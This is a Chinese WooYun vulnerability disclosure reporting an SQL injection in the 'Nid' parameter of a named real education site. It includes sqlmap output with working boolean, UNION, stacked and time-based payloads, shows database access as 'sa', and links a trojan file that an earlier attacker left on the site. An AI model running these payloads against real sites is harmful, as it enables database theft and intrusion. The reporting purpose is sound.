乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-06-30: 厂商已经主动忽略漏洞,细节向公众公开
呵呵
wooyun管理员请看好,别说影响不大,都是数据啊,黑产的最爱啊!!!1.本来想拿下webshell在提交的,想想觉得gov还是点到为止吧!2.由于发现前人木马所以决定马上提交(站长请看下有没有被托库)!3.影响蛮大的,注入是sa权限可跨库!
注入点 http://jxjy.yzrsks.com/news_view.jsp?Nid=59
注入地址:http://jxjy.yzrsks.com/news_view.jsp?Nid=59 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 22:34:05[22:34:05] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\jxjy.yzrsks.com\session' as session file[22:34:05] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file[22:34:05] [INFO] testing connection to the target url[22:34:05] [INFO] heuristics detected web page charset 'GB2312'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: Nid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Nid=59 AND 7243=7243 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Nid=-5374 UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(112)+CHAR(100)+CHAR(103)+CHAR(58)+CHAR(120)+CHAR(106)+CHAR(99)+CHAR(85)+CHAR(116)+CHAR(120)+CHAR(110)+CHAR(73)+CHAR(89)+CHAR(109)+CHAR(58)+CHAR(119)+CHAR(112)+CHAR(100)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Nid=59; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Nid=59 WAITFOR DELAY '0:0:5'-----[22:34:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2005[22:34:05] [INFO] fetching current usercurrent user: 'sa'[22:34:06] [INFO] Fetched data logged to text files under 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\jxjy.yzrsks.com'
前人木马
http://jxjy.yzrsks.com/123.txt
详细说明
过滤,检查下服务器等....
未能联系到厂商或者厂商积极拒绝